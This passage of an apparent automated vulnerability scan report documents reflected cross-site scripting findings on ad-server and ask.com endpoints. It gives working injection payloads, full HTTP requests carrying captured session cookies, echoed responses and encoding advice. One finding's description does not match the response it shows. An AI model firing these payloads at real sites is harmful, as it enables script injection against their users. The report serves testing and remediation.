GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281fa829'-alert(1)-'9126a56ebc&kltstamp=2011-7-15%2013%3A42%3A18&ranreq=0.9575279243290424&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699; PUBMDCID=1; _curtime=1313432705; PMDTSHR=cat:; KTPCACOOKIE=YES; pubfreq_25281=243-1; pubfreq_28134=243-1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 15 Aug 2011 18:41:34 GMT
Content-Length: 1672
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:41:34 GMT; path=/
Set-Cookie: _curtime=1313433694; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:51:34 GMT; path=/
Set-Cookie: pubfreq_25281_19972_1470462086=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:21:34 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:41:34 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281fa829'-alert(1)-'9126a56ebc" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAETgAAwAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQ
...[SNIP]...

1.48. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b47b'-alert(1)-'7cb674115cb was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be JavaScript-string-encoded before it is written into the quoted literal, with every character outside [A-Za-z0-9] emitted as \xHH or \uHHHH. HTML-entity encoding does nothing inside a script block, and the sequence </script> terminates the block regardless of the JavaScript quoting around it, so the encoding has to cover angle brackets and slashes as well as quote characters and backslashes.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html2b47b'-alert(1)-'7cb674115cb&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A25%3A48&ranreq=0.6436679325997829&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; PUBMDCID=1; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 15 Aug 2011 18:26:12 GMT
Content-Length: 1848
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:12 GMT; path=/
Set-Cookie: _curtime=1313432772; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:36:12 GMT; path=/
Set-Cookie: pubfreq_25281_19972_662613790=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:12 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:12 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...
width=728&kadheight=90&kltstamp=1313432772&indirectAdId=0&adServerOptimizerId=2&ranreq=0.6436679325997829&campaignId=1336&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html2b47b'-alert(1)-'7cb674115cb">
...[SNIP]...

1.49. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a87a1'-alert(1)-'8cf6d220125 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be JavaScript-string-encoded before it is written into the quoted literal, with every character outside [A-Za-z0-9] emitted as \xHH or \uHHHH. HTML-entity encoding does nothing inside a script block, and the sequence </script> terminates the block regardless of the JavaScript quoting around it, so the encoding has to cover angle brackets and slashes as well as quote characters and backslashes.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A25%3A48&ranreq=0.6436679325997829a87a1'-alert(1)-'8cf6d220125&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; PUBMDCID=1; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1751
Date: Mon, 15 Aug 2011 18:26:12 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:12 GMT; path=/
Set-Cookie: pubfreq_25281_19972_992644624=661-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:12 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:12 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAET
...[SNIP]...
eId=25281&adId=19972&adServerId=661&kefact=0.934960&kpbmtpfact=0.000000&kadNetFrequecy=1&kadwidth=728&kadheight=90&kltstamp=1313432772&indirectAdId=24815&adServerOptimizerId=1&ranreq=0.6436679325997829a87a1'-alert(1)-'8cf6d220125&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html">
...[SNIP]...

1.50. http://syndication.exoclick.com/ads-iframe-display.php [bgcolor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.exoclick.com
Path:   /ads-iframe-display.php

Issue detail

The value of the bgcolor request parameter is copied into the style attribute of the <body> tag, which is encapsulated in double quotation marks. The payload 99dcf"><script>alert(1)</script>91fc3346e8c was submitted in the bgcolor parameter. This input was echoed unmodified in the application's response, closing the attribute and the tag and leaving the injected <script> element as a child of the document.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads-iframe-display.php?type=945x100&login=xhamster&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF99dcf"><script>alert(1)</script>91fc3346e8c&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=&text_only=0&show_thumb=&idzone=147655&idsite=34954&p=http://www.xhamster.com&dt=1313434612256 HTTP/1.1
Host: syndication.exoclick.com
Proxy-Connection: keep-alive
Referer: http://custom.exoclick.com/xhamster-945x100.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 15 Aug 2011 18:56:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 328

<html>
<body style="margin: 0px; background-color: #FFFFFF99dcf"><script>alert(1)</script>91fc3346e8c; font-family: Verdana, Arial;">
<body style="margin: 0px;">
<iframe src="http://ifa.xhamstercams
...[SNIP]...

1.51. http://syndication.exoclick.com/ads-iframe-display.php [font parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.exoclick.com
Path:   /ads-iframe-display.php

Issue detail

The value of the font request parameter is copied into the font-family declaration of the <body> tag's style attribute, which is encapsulated in double quotation marks. The payload b0612"><script>alert(1)</script>65a7bd969c5 was submitted in the font parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads-iframe-display.php?type=945x100&login=xhamster&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=b0612"><script>alert(1)</script>65a7bd969c5&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=&text_only=0&show_thumb=&idzone=147655&idsite=34954&p=http://www.xhamster.com&dt=1313434612256 HTTP/1.1
Host: syndication.exoclick.com
Proxy-Connection: keep-alive
Referer: http://custom.exoclick.com/xhamster-945x100.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 15 Aug 2011 18:56:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 314

<html>
<body style="margin: 0px; background-color: #FFFFFF; font-family: b0612"><script>alert(1)</script>65a7bd969c5;">
<body style="margin: 0px;">
<iframe src="http://ifa.xhamstercams.com/dif/?cid=
...[SNIP]...

1.52. http://v2.tudou.com/tdct/commonadv.html [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://v2.tudou.com
Path:   /tdct/commonadv.html

Issue detail

The value of the jsoncallback request parameter is copied to the start of the response body as the name of the JSONP callback function, without any validation of the characters it contains. The payload 155d9<script>alert(1)</script>13fff8eccf4 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response. Because the response is served with Content-Type: text/html;charset=GBK rather than as script, a browser sent directly to this URL parses the body as HTML and executes the injected <script> element.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tdct/commonadv.html?date=8-15-13&jsoncallback=adExtension.callback155d9<script>alert(1)</script>13fff8eccf4&areaCode=0&positionId=4101 HTTP/1.1
Host: v2.tudou.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: juid=bl9jp2sf91i; pageStep=2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0
Vary: Accept-Encoding
Content-Type: text/html;charset=GBK
Date: Mon, 15 Aug 2011 18:58:51 GMT
X-Cache: MISS from adextensioncontrol.tudou.com
Content-Length: 77552

adExtension.callback155d9<script>alert(1)</script>13fff8eccf4({"mulSel":[],"commonAdvReturnEntityList":[{"textContent":"","isMulSel":0,"seedFlashTitle":"","ownerId":"100203","thirdPartClick":"","specialTime":0,"mustShowFlag":0,"videoList":[{"duration":"1:09","re
...[SNIP]...

1.53. http://www.ask.com/news [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d629</script><script>alert(1)</script>5e777743ea1 was submitted in the q parameter. This input was echoed unmodified in the application's response. Note that this payload does not break out of the quoted string at all: the HTML parser ends the enclosing <script> block at the first literal </script> it meets, regardless of the JavaScript quoting around it, and the <script> element that follows is parsed as a new script. Escaping only the quote characters would therefore not close this issue.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be JavaScript-string-encoded before it is written into the quoted literal, with every character outside [A-Za-z0-9] emitted as \xHH or \uHHHH. HTML-entity encoding does nothing inside a script block, and the sequence </script> terminates the block regardless of the JavaScript quoting around it, so the encoding has to cover angle brackets and slashes as well as quote characters and backslashes.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss8d629</script><script>alert(1)</script>5e777743ea1 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQXMAADyFgG0AAAA1
from-tr: trafrt005iad.io.askjeeves.info
Content-Length: 64756
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-news1&ch=&ty=image%2Cflash&size=300x250&kw=xss8d629</script><script>alert(1)</script>5e777743ea1&hints=xss8d629</script>
...[SNIP]...

1.54. http://www.ask.com/news [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a56d"><script>alert(1)</script>6a435691c6e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news?o=0&l=dir&qsrc=168&q=6a56d"><script>alert(1)</script>6a435691c6e HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllLQpcQKQAAHD@VTYAAAIK
from-tr: trafrt012iad.io.askjeeves.info
Content-Length: 64591
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:58 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjU3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:57 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-news1&ch=&ty=image%2Cflash&size=300x250&kw=6a56d"><script>alert(1)</script>6a435691c6e&hints=6a56d">
...[SNIP]...

1.55. http://www.ask.com/pictures [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8935d"><script>alert(1)</script>72fe6858d8c was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=8935d"><script>alert(1)</script>72fe6858d8c&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllIwpcQXMAADyFdcUAAABi
from-tr: trafrt005iad.io.askjeeves.info
Content-Length: 67992
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:48 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjQ3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:47 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-special&ch=&ty=image%2Cflash&size=300x250&kw=8935d"><script>alert(1)</script>72fe6858d8c&hints=8935d">
...[SNIP]...

1.56. http://www.ask.com/pictures [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b5e</script><script>alert(1)</script>b21e6c4ebb7 was submitted in the q parameter. This input was echoed unmodified in the application's response. As in 1.53, the payload does not break out of the quoted string: the HTML parser ends the enclosing <script> block at the first literal </script>, regardless of the JavaScript quoting around it, and the <script> element that follows is parsed as a new script. Escaping only the quote characters would therefore not close this issue.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be JavaScript-string-encoded before it is written into the quoted literal, with every character outside [A-Za-z0-9] emitted as \xHH or \uHHHH. HTML-entity encoding does nothing inside a script block, and the sequence </script> terminates the block regardless of the JavaScript quoting around it, so the encoding has to cover angle brackets and slashes as well as quote characters and backslashes.
